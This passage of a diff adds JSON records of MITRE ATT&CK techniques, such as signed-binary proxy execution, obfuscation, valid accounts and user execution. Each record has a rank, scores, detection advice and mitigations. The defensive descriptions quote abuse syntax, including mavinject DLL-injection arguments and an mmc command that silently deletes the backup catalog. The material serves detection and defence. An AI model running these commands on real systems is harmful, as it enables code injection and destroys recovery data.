ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)", + "url": "https://attack.mitre.org/techniques/T1218/011", + "detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.", + "mitigations": [ + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + } + ] + }, + { + "tid": "T1218.012", + "name": "Signed Binary Proxy Execution: Verclsid", + "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to Regsvr32). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ", + "url": "https://attack.mitre.org/techniques/T1218/012", + "detection": "Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1218.013", + "name": "Signed Binary Proxy Execution: Mavinject", + "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \nIn addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)", + "url": "https://attack.mitre.org/techniques/T1218/013", + "detection": "Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.\nAdversaries may rename abusable binaries to evade detections, but the argument INJECTRUNNING is required for mavinject.exe to perform Dynamic-link Library Injection and may therefore be monitored to alert malicious activity.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1218.014", + "name": "Signed Binary Proxy Execution: MMC", + "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. Inhibit System Recovery) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a Component Object Model class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)", + "url": "https://attack.mitre.org/techniques/T1218/014", + "detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + } + ] + }, + { + "rank": 15, + "tid": "T1027", + "name": "Obfuscated Files or Information", + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. \nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\nAdversaries may also obfuscate commands executed from payloads or directly via a Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ", + "url": "https://attack.mitre.org/techniques/T1027", + "detection": "Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). \nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) \nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. \nThe first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ", + "score": 1.8304554154180952, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ], + "subtechniques": [ + { + "tid": "T1027.001", + "name": "Obfuscated Files or Information: Binary Padding", + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ", + "url": "https://attack.mitre.org/techniques/T1027/001", + "detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ", + "mitigations": [] + }, + { + "tid": "T1027.002", + "name": "Obfuscated Files or Information: Software Packing", + "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. ", + "url": "https://attack.mitre.org/techniques/T1027/002", + "detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ] + }, + { + "tid": "T1027.003", + "name": "Obfuscated Files or Information: Steganography", + "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\nDuqu was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \nBy the end of 2017, a threat group used Invoke-PSImage to hide PowerShell commands in an image file (.png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ", + "url": "https://attack.mitre.org/techniques/T1027/003", + "detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.", + "mitigations": [] + }, + { + "tid": "T1027.004", + "name": "Obfuscated Files or Information: Compile After Delivery", + "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a Phishing. Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)", + "url": "https://attack.mitre.org/techniques/T1027/004", + "detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.", + "mitigations": [] + }, + { + "tid": "T1027.005", + "name": "Obfuscated Files or Information: Indicator Removal from Tools", + "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.", + "url": "https://attack.mitre.org/techniques/T1027/005", + "detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.", + "mitigations": [] + }, + { + "tid": "T1027.006", + "name": "Obfuscated Files or Information: HTML Smuggling", + "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. Deobfuscate/Decode Files or Information), potentially bypassing content filters.\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)", + "url": "https://attack.mitre.org/techniques/T1027/006", + "detection": "Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as Blob, msSaveOrOpenBlob, and/or download may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.\nConsider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.", + "mitigations": [] + } + ] + }, + { + "rank": 16, + "tid": "T1078", + "name": "Valid Accounts", + "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)", + "url": "https://attack.mitre.org/techniques/T1078", + "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", + "score": 1.8097713573590475, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ], + "subtechniques": [ + { + "tid": "T1078.001", + "name": "Valid Accounts: Default Accounts", + "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.(Citation: Metasploit SSH Module)", + "url": "https://attack.mitre.org/techniques/T1078/001", + "detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1078.002", + "name": "Valid Accounts: Domain Accounts", + "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as OS Credential Dumping or password reuse, allowing access to privileged resources of the domain.", + "url": "https://attack.mitre.org/techniques/T1078/002", + "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\nOn Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) \nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1078.003", + "name": "Valid Accounts: Local Accounts", + "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\nLocal Accounts may also be abused to elevate privileges and harvest credentials through OS Credential Dumping. Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ", + "url": "https://attack.mitre.org/techniques/T1078/003", + "detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1078.004", + "name": "Valid Accounts: Cloud Accounts", + "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a Trusted Relationship. Similar to Domain Accounts, compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.", + "url": "https://attack.mitre.org/techniques/T1078/004", + "detection": "Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + } + ] + }, + { + "rank": 17, + "tid": "T1204", + "name": "User Execution", + "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.\nWhile User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.", + "url": "https://attack.mitre.org/techniques/T1204", + "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", + "score": 1.7715499995819046, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ], + "subtechniques": [ + { + "tid": "T1204.001", + "name": "User Execution: Malicious Link", + "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead users to download files that require execution via Malicious File.", + "url": "https://attack.mitre.org/techniques/T1204/001", + "detection": "Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.\nAnti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1204.002", + "name": "User Execution: Malicious File", + "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\nAdversaries may employ various forms of Masquerading on the file to increase the likelihood that a user will open it.\nWhile Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.", + "url": "https://attack.mitre.org/techniques/T1204/002", + "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1204.003", + "name": "User Execution: Malicious Image", + "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via Upload Malware, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing 